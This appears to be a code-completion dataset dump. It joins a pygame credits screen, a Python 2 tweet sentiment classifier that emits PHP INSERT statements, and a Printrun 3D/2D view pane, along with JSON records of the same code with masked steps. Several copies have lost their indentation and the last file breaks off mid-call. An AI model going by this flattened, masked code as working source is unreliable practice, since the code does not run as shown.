pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'EXIT', 40, 488, 660)
button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)
pygame.display.flip()
if __name__ == '__main__':
main()
pygame.quit()
<|reserved_special_token_1|>
import os, pygame
import sys
from os import path
from random import choice
WIDTH = 1000
HEIGHT = 800
FPS = 60
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
GRAY80 = (204, 204, 204)
GRAY = (26, 26, 26)
screen = pygame.display.set_mode((1000, 800))
game_folder = os.path.dirname(__file__)
img_folder = os.path.join(game_folder, "img")
def draw_text(surf, text, size, x, y):
font_name = pygame.font.match_font('OCR A Extended')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = (x, y)
surf.blit(text_surface, text_rect)
def button(msg,x,y,w,h,ic,ac,action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
print(click)
if x+w > mouse[0] > x and y+h > mouse[1] > y:
pygame.draw.rect(screen, ac,(x,y,w,h))
if click[0] == 1 and action != None:
if action == quit:
pygame.quit()
quit()
else:
pygame.draw.rect(screen, ic,(x,y,w,h))
def main():
# Initialise screen
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((1000, 800))
pygame.display.set_caption('Credits')
# Fill background
background = pygame.image.load(os.path.join(img_folder, "STARS1.jpg")).convert_alpha()
clock = pygame.time.Clock()
start_ticks=pygame.time.get_ticks()
screen.blit(background, (0, 0))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
quit()
screen.blit(background, (0, 0))
pygame.draw.rect(screen, GRAY,(400,650,190,60))
draw_text(screen, "Credits", 60, 500, 100)
draw_text(screen, "Vincent", 30, 500, 250)
draw_text(screen, "Chevery", 30, 500, 330)
draw_text(screen, "Charlie", 30, 500, 410)
draw_text(screen, "Julian", 30, 500, 490)
draw_text(screen, "Sheriyar", 30, 500, 570)
draw_text(screen, "Julian", 30, 500, 650)
mouse = pygame.mouse.get_pos()
if 400+190 > mouse[0] > 400 and 650+60 > mouse[1] > 650:
pygame.draw.rect(screen, GRAY80,(400,650,190,60))
else:
pygame.draw.rect(screen, GRAY,(400,650,190,60))
draw_text(screen, "EXIT", 40, 488, 660)
#screen.blit(arrow, imagerect)
button("EXIT",400,650,190,60,GRAY,GRAY80,quit)
pygame.display.flip()
if __name__ == '__main__':
main()
pygame.quit()
|
flexible
|
{
"blob_id": "7301a521586049ebb5e8e49b604cc96e3acc1fe9",
"index": 3512,
"step-1": "<mask token>\n\n\ndef draw_text(surf, text, size, x, y):\n font_name = pygame.font.match_font('OCR A Extended')\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = x, y\n surf.blit(text_surface, text_rect)\n\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n print(click)\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\n pygame.draw.rect(screen, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n if action == quit:\n pygame.quit()\n quit()\n else:\n pygame.draw.rect(screen, ic, (x, y, w, h))\n\n\ndef main():\n pygame.init()\n pygame.mixer.init()\n screen = pygame.display.set_mode((1000, 800))\n pygame.display.set_caption('Credits')\n background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')\n ).convert_alpha()\n clock = pygame.time.Clock()\n start_ticks = pygame.time.get_ticks()\n screen.blit(background, (0, 0))\n pygame.display.flip()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n quit()\n screen.blit(background, (0, 0))\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'Credits', 60, 500, 100)\n draw_text(screen, 'Vincent', 30, 500, 250)\n draw_text(screen, 'Chevery', 30, 500, 330)\n draw_text(screen, 'Charlie', 30, 500, 410)\n draw_text(screen, 'Julian', 30, 500, 490)\n draw_text(screen, 'Sheriyar', 30, 500, 570)\n draw_text(screen, 'Julian', 30, 500, 650)\n mouse = pygame.mouse.get_pos()\n if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:\n pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))\n else:\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'EXIT', 40, 488, 660)\n button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)\n pygame.display.flip()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef draw_text(surf, text, size, x, y):\n font_name = pygame.font.match_font('OCR A Extended')\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = x, y\n surf.blit(text_surface, text_rect)\n\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n print(click)\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\n pygame.draw.rect(screen, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n if action == quit:\n pygame.quit()\n quit()\n else:\n pygame.draw.rect(screen, ic, (x, y, w, h))\n\n\ndef main():\n pygame.init()\n pygame.mixer.init()\n screen = pygame.display.set_mode((1000, 800))\n pygame.display.set_caption('Credits')\n background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')\n ).convert_alpha()\n clock = pygame.time.Clock()\n start_ticks = pygame.time.get_ticks()\n screen.blit(background, (0, 0))\n pygame.display.flip()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n quit()\n screen.blit(background, (0, 0))\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'Credits', 60, 500, 100)\n draw_text(screen, 'Vincent', 30, 500, 250)\n draw_text(screen, 'Chevery', 30, 500, 330)\n draw_text(screen, 'Charlie', 30, 500, 410)\n draw_text(screen, 'Julian', 30, 500, 490)\n draw_text(screen, 'Sheriyar', 30, 500, 570)\n draw_text(screen, 'Julian', 30, 500, 650)\n mouse = pygame.mouse.get_pos()\n if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:\n pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))\n else:\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'EXIT', 40, 488, 660)\n button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)\n pygame.display.flip()\n\n\nif __name__ == '__main__':\n main()\n pygame.quit()\n",
"step-3": "<mask token>\nWIDTH = 1000\nHEIGHT = 800\nFPS = 60\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nRED = 255, 0, 0\nGREEN = 0, 255, 0\nBLUE = 0, 0, 255\nYELLOW = 255, 255, 0\nGRAY80 = 204, 204, 204\nGRAY = 26, 26, 26\nscreen = pygame.display.set_mode((1000, 800))\ngame_folder = os.path.dirname(__file__)\nimg_folder = os.path.join(game_folder, 'img')\n\n\ndef draw_text(surf, text, size, x, y):\n font_name = pygame.font.match_font('OCR A Extended')\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = x, y\n surf.blit(text_surface, text_rect)\n\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n print(click)\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\n pygame.draw.rect(screen, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n if action == quit:\n pygame.quit()\n quit()\n else:\n pygame.draw.rect(screen, ic, (x, y, w, h))\n\n\ndef main():\n pygame.init()\n pygame.mixer.init()\n screen = pygame.display.set_mode((1000, 800))\n pygame.display.set_caption('Credits')\n background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')\n ).convert_alpha()\n clock = pygame.time.Clock()\n start_ticks = pygame.time.get_ticks()\n screen.blit(background, (0, 0))\n pygame.display.flip()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n quit()\n screen.blit(background, (0, 0))\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'Credits', 60, 500, 100)\n draw_text(screen, 'Vincent', 30, 500, 250)\n draw_text(screen, 'Chevery', 30, 500, 330)\n draw_text(screen, 'Charlie', 30, 500, 410)\n draw_text(screen, 'Julian', 30, 500, 490)\n draw_text(screen, 'Sheriyar', 30, 500, 570)\n draw_text(screen, 'Julian', 30, 500, 650)\n mouse = pygame.mouse.get_pos()\n if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:\n pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))\n else:\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'EXIT', 40, 488, 660)\n button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)\n pygame.display.flip()\n\n\nif __name__ == '__main__':\n main()\n pygame.quit()\n",
"step-4": "import os, pygame\nimport sys\nfrom os import path\nfrom random import choice\nWIDTH = 1000\nHEIGHT = 800\nFPS = 60\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nRED = 255, 0, 0\nGREEN = 0, 255, 0\nBLUE = 0, 0, 255\nYELLOW = 255, 255, 0\nGRAY80 = 204, 204, 204\nGRAY = 26, 26, 26\nscreen = pygame.display.set_mode((1000, 800))\ngame_folder = os.path.dirname(__file__)\nimg_folder = os.path.join(game_folder, 'img')\n\n\ndef draw_text(surf, text, size, x, y):\n font_name = pygame.font.match_font('OCR A Extended')\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = x, y\n surf.blit(text_surface, text_rect)\n\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n print(click)\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\n pygame.draw.rect(screen, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n if action == quit:\n pygame.quit()\n quit()\n else:\n pygame.draw.rect(screen, ic, (x, y, w, h))\n\n\ndef main():\n pygame.init()\n pygame.mixer.init()\n screen = pygame.display.set_mode((1000, 800))\n pygame.display.set_caption('Credits')\n background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')\n ).convert_alpha()\n clock = pygame.time.Clock()\n start_ticks = pygame.time.get_ticks()\n screen.blit(background, (0, 0))\n pygame.display.flip()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n quit()\n screen.blit(background, (0, 0))\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'Credits', 60, 500, 100)\n draw_text(screen, 'Vincent', 30, 500, 250)\n draw_text(screen, 'Chevery', 30, 500, 330)\n draw_text(screen, 'Charlie', 30, 500, 410)\n draw_text(screen, 'Julian', 30, 500, 490)\n draw_text(screen, 'Sheriyar', 30, 500, 570)\n draw_text(screen, 'Julian', 30, 500, 650)\n mouse = pygame.mouse.get_pos()\n if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:\n pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))\n else:\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'EXIT', 40, 488, 660)\n button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)\n pygame.display.flip()\n\n\nif __name__ == '__main__':\n main()\n pygame.quit()\n",
"step-5": "import os, pygame\r\nimport sys\r\nfrom os import path\r\nfrom random import choice\r\n\r\nWIDTH = 1000\r\nHEIGHT = 800\r\nFPS = 60\r\n\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255, 255, 0)\r\nGRAY80 = (204, 204, 204)\r\nGRAY = (26, 26, 26)\r\n\r\n\r\nscreen = pygame.display.set_mode((1000, 800))\r\ngame_folder = os.path.dirname(__file__)\r\nimg_folder = os.path.join(game_folder, \"img\")\r\n\r\ndef draw_text(surf, text, size, x, y):\r\n font_name = pygame.font.match_font('OCR A Extended')\r\n font = pygame.font.Font(font_name, size)\r\n text_surface = font.render(text, True, WHITE)\r\n text_rect = text_surface.get_rect()\r\n text_rect.midtop = (x, y)\r\n surf.blit(text_surface, text_rect)\r\n\r\ndef button(msg,x,y,w,h,ic,ac,action=None):\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n print(click)\r\n\r\n if x+w > mouse[0] > x and y+h > mouse[1] > y:\r\n pygame.draw.rect(screen, ac,(x,y,w,h))\r\n if click[0] == 1 and action != None:\r\n if action == quit:\r\n pygame.quit()\r\n quit()\r\n else:\r\n pygame.draw.rect(screen, ic,(x,y,w,h))\r\n\r\ndef main():\r\n # Initialise screen\r\n pygame.init()\r\n pygame.mixer.init()\r\n screen = pygame.display.set_mode((1000, 800))\r\n pygame.display.set_caption('Credits')\r\n\r\n # Fill background\r\n background = pygame.image.load(os.path.join(img_folder, \"STARS1.jpg\")).convert_alpha()\r\n clock = pygame.time.Clock()\r\n start_ticks=pygame.time.get_ticks()\r\n screen.blit(background, (0, 0))\r\n pygame.display.flip()\r\n running = True\r\n\r\n while running:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n return\r\n quit()\r\n\r\n screen.blit(background, (0, 0))\r\n pygame.draw.rect(screen, GRAY,(400,650,190,60))\r\n draw_text(screen, \"Credits\", 60, 500, 100)\r\n draw_text(screen, \"Vincent\", 30, 500, 250)\r\n draw_text(screen, \"Chevery\", 30, 500, 330)\r\n draw_text(screen, \"Charlie\", 30, 500, 410)\r\n draw_text(screen, \"Julian\", 30, 500, 490)\r\n draw_text(screen, \"Sheriyar\", 30, 500, 570)\r\n draw_text(screen, \"Julian\", 30, 500, 650)\r\n\r\n mouse = pygame.mouse.get_pos()\r\n\r\n if 400+190 > mouse[0] > 400 and 650+60 > mouse[1] > 650:\r\n pygame.draw.rect(screen, GRAY80,(400,650,190,60))\r\n else:\r\n pygame.draw.rect(screen, GRAY,(400,650,190,60))\r\n \r\n draw_text(screen, \"EXIT\", 40, 488, 660)\r\n #screen.blit(arrow, imagerect)\r\n button(\"EXIT\",400,650,190,60,GRAY,GRAY80,quit)\r\n \r\n pygame.display.flip()\r\n\r\nif __name__ == '__main__': \r\n main()\r\n pygame.quit()\r\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import collections
import re
from collections import Counter
import operator
import pickle
import math
import json
path='C:/Users/rahul/Desktop/CSCI 544/HW 2/op_spam_train/'
#path=sys.argv[1]
badWordList = ['and','the','was','for']
RE=r'\b[^\W\d_]+\b'
# NEGATIVE TWEETS
c=collections.Counter()
NT="negativeTweets.txt/"
with open("negativeTweets.txt") as f:
c.update( word.lower() for line in f for word in re.findall(r'\b[^\W\d_]+\b', line) if len(word)>2 and word not in badWordList)
# POSITIVE TWEETS
d=collections.Counter()
PT="positiveTweets.txt/"
with open("positiveTweets.txt") as f:
d.update( word.lower() for line in f for word in re.findall(r'\b[^\W\d_]+\b', line) if len(word)>2 and word not in badWordList)
# Storing Counts in a dictionary nb
dicts=[dict(c),dict(d)]
nb,cnt={},0
for d in dicts:
for k, v in d.items():
if(k in nb): nb[k][cnt]= nb[k][cnt]+v
else:
nb[k]=[1,1]
nb[k][cnt]= nb[k][cnt]+v
cnt=cnt+1
for k,v in nb.items():
print k,v
print len(nb);
totalClassWord=[0,0]
for k, v in nb.items():
totalClassWord=[x + y for x, y in zip(totalClassWord, v)]
prob={}
for k, v in nb.items():
prob[k]=[0,0]
prob[k][0]= math.log10( float(nb[k][0])/float(totalClassWord[0]))
prob[k][1]= math.log10( float(nb[k][1])/float(totalClassWord[1]))
for k,v in prob.items():
print k,v
#Dumping dictionary as JSON object in file
#with open('hackTechTweetClassificationModel.txt', 'wb') as handle: pickle.dump(prob, handle)
keys=json.dumps(prob, sort_keys=True)
output_file=open('hackTechTweetClassificationModel.txt', 'w')
output_file.write(keys)
output_file.close()
output_file=open('hackTechTweetPHP.php', 'w')
#Format of PHP output
#$result=mysqli_query($con, "INSERT INTO ttrain VALUES ('aaa','-2.232','222.4234')" );
for k,v in prob.items():
strop="$result=mysqli_query($con, \"INSERT INTO ttrain VALUES (\'"+str(k)+"\',\'"+str(v[0])+"\',\'"+str(v[1])+"\')\" );\n"
output_file.write(strop)
output_file.close()
|
normal
|
{
"blob_id": "42e16def0fcf234f3d7c2709de36a321d8ddf29e",
"index": 7598,
"step-1": "import collections\nimport re\nfrom collections import Counter\nimport operator\nimport pickle\nimport math\nimport json\n\npath='C:/Users/rahul/Desktop/CSCI 544/HW 2/op_spam_train/'\n#path=sys.argv[1]\n\nbadWordList = ['and','the','was','for']\nRE=r'\\b[^\\W\\d_]+\\b'\n\n# NEGATIVE TWEETS\nc=collections.Counter()\nNT=\"negativeTweets.txt/\"\nwith open(\"negativeTweets.txt\") as f: \n c.update( word.lower() for line in f for word in re.findall(r'\\b[^\\W\\d_]+\\b', line) if len(word)>2 and word not in badWordList)\n\n# POSITIVE TWEETS\nd=collections.Counter()\nPT=\"positiveTweets.txt/\"\nwith open(\"positiveTweets.txt\") as f: \n d.update( word.lower() for line in f for word in re.findall(r'\\b[^\\W\\d_]+\\b', line) if len(word)>2 and word not in badWordList)\n\n# Storing Counts in a dictionary nb\ndicts=[dict(c),dict(d)] \nnb,cnt={},0\nfor d in dicts:\n for k, v in d.items():\n if(k in nb): nb[k][cnt]= nb[k][cnt]+v\n else: \n nb[k]=[1,1]\n nb[k][cnt]= nb[k][cnt]+v\n cnt=cnt+1\n\nfor k,v in nb.items():\n print k,v\n \nprint len(nb);\n\ntotalClassWord=[0,0]\nfor k, v in nb.items():\n totalClassWord=[x + y for x, y in zip(totalClassWord, v)]\n\nprob={} \nfor k, v in nb.items():\n prob[k]=[0,0]\n prob[k][0]= math.log10( float(nb[k][0])/float(totalClassWord[0]))\n prob[k][1]= math.log10( float(nb[k][1])/float(totalClassWord[1]))\n\nfor k,v in prob.items():\n print k,v\n\n#Dumping dictionary as JSON object in file\n#with open('hackTechTweetClassificationModel.txt', 'wb') as handle: pickle.dump(prob, handle)\nkeys=json.dumps(prob, sort_keys=True)\noutput_file=open('hackTechTweetClassificationModel.txt', 'w')\noutput_file.write(keys)\noutput_file.close()\n\noutput_file=open('hackTechTweetPHP.php', 'w')\n#Format of PHP output\n#$result=mysqli_query($con, \"INSERT INTO ttrain VALUES ('aaa','-2.232','222.4234')\" );\nfor k,v in prob.items():\n strop=\"$result=mysqli_query($con, \\\"INSERT INTO ttrain VALUES (\\'\"+str(k)+\"\\',\\'\"+str(v[0])+\"\\',\\'\"+str(v[1])+\"\\')\\\" );\\n\" \n output_file.write(strop)\noutput_file.close()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class NoViz:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel=None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel:
parentpanel = root.panel
if root.settings.mainviz == 'None':
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == '2D'
if root.settings.mainviz == '3D':
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,
root.build_dimensions_list, root=root, circular=root.
settings.circular_bed, antialias_samples=int(root.
settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions
=root.build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_(
'Click to examine / edit\n layers of loaded file')))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.
ID_ANY,
'Gcode view, shift to move view, mousewheel to set layer',
size=(600, 600), build_dimensions=root.
build_dimensions_list, objects=objects, root=root,
circular=root.settings.circular_bed, antialias_samples=
int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions=root.
build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.
ALIGN_CENTER_HORIZONTAL)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class NoViz:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
<|reserved_special_token_0|>
def setlayer(self, *a):
pass
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel=None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel:
parentpanel = root.panel
if root.settings.mainviz == 'None':
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == '2D'
if root.settings.mainviz == '3D':
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,
root.build_dimensions_list, root=root, circular=root.
settings.circular_bed, antialias_samples=int(root.
settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions
=root.build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_(
'Click to examine / edit\n layers of loaded file')))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.
ID_ANY,
'Gcode view, shift to move view, mousewheel to set layer',
size=(600, 600), build_dimensions=root.
build_dimensions_list, objects=objects, root=root,
circular=root.settings.circular_bed, antialias_samples=
int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions=root.
build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.
ALIGN_CENTER_HORIZONTAL)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class NoViz:
<|reserved_special_token_0|>
def clear(self, *a):
pass
<|reserved_special_token_0|>
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
<|reserved_special_token_0|>
def setlayer(self, *a):
pass
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel=None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel:
parentpanel = root.panel
if root.settings.mainviz == 'None':
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == '2D'
if root.settings.mainviz == '3D':
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,
root.build_dimensions_list, root=root, circular=root.
settings.circular_bed, antialias_samples=int(root.
settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions
=root.build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_(
'Click to examine / edit\n layers of loaded file')))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.
ID_ANY,
'Gcode view, shift to move view, mousewheel to set layer',
size=(600, 600), build_dimensions=root.
build_dimensions_list, objects=objects, root=root,
circular=root.settings.circular_bed, antialias_samples=
int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions=root.
build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.
ALIGN_CENTER_HORIZONTAL)
<|reserved_special_token_1|>
import traceback
import logging
import wx
class NoViz:
showall = False
def clear(self, *a):
pass
def addfile_perlayer(self, gcode, showall=False):
layer_idx = 0
while layer_idx < len(gcode.all_layers):
yield layer_idx
layer_idx += 1
yield None
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
def Refresh(self, *a):
pass
def setlayer(self, *a):
pass
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel=None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel:
parentpanel = root.panel
if root.settings.mainviz == 'None':
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == '2D'
if root.settings.mainviz == '3D':
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,
root.build_dimensions_list, root=root, circular=root.
settings.circular_bed, antialias_samples=int(root.
settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions
=root.build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_(
'Click to examine / edit\n layers of loaded file')))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.
ID_ANY,
'Gcode view, shift to move view, mousewheel to set layer',
size=(600, 600), build_dimensions=root.
build_dimensions_list, objects=objects, root=root,
circular=root.settings.circular_bed, antialias_samples=
int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions=root.
build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
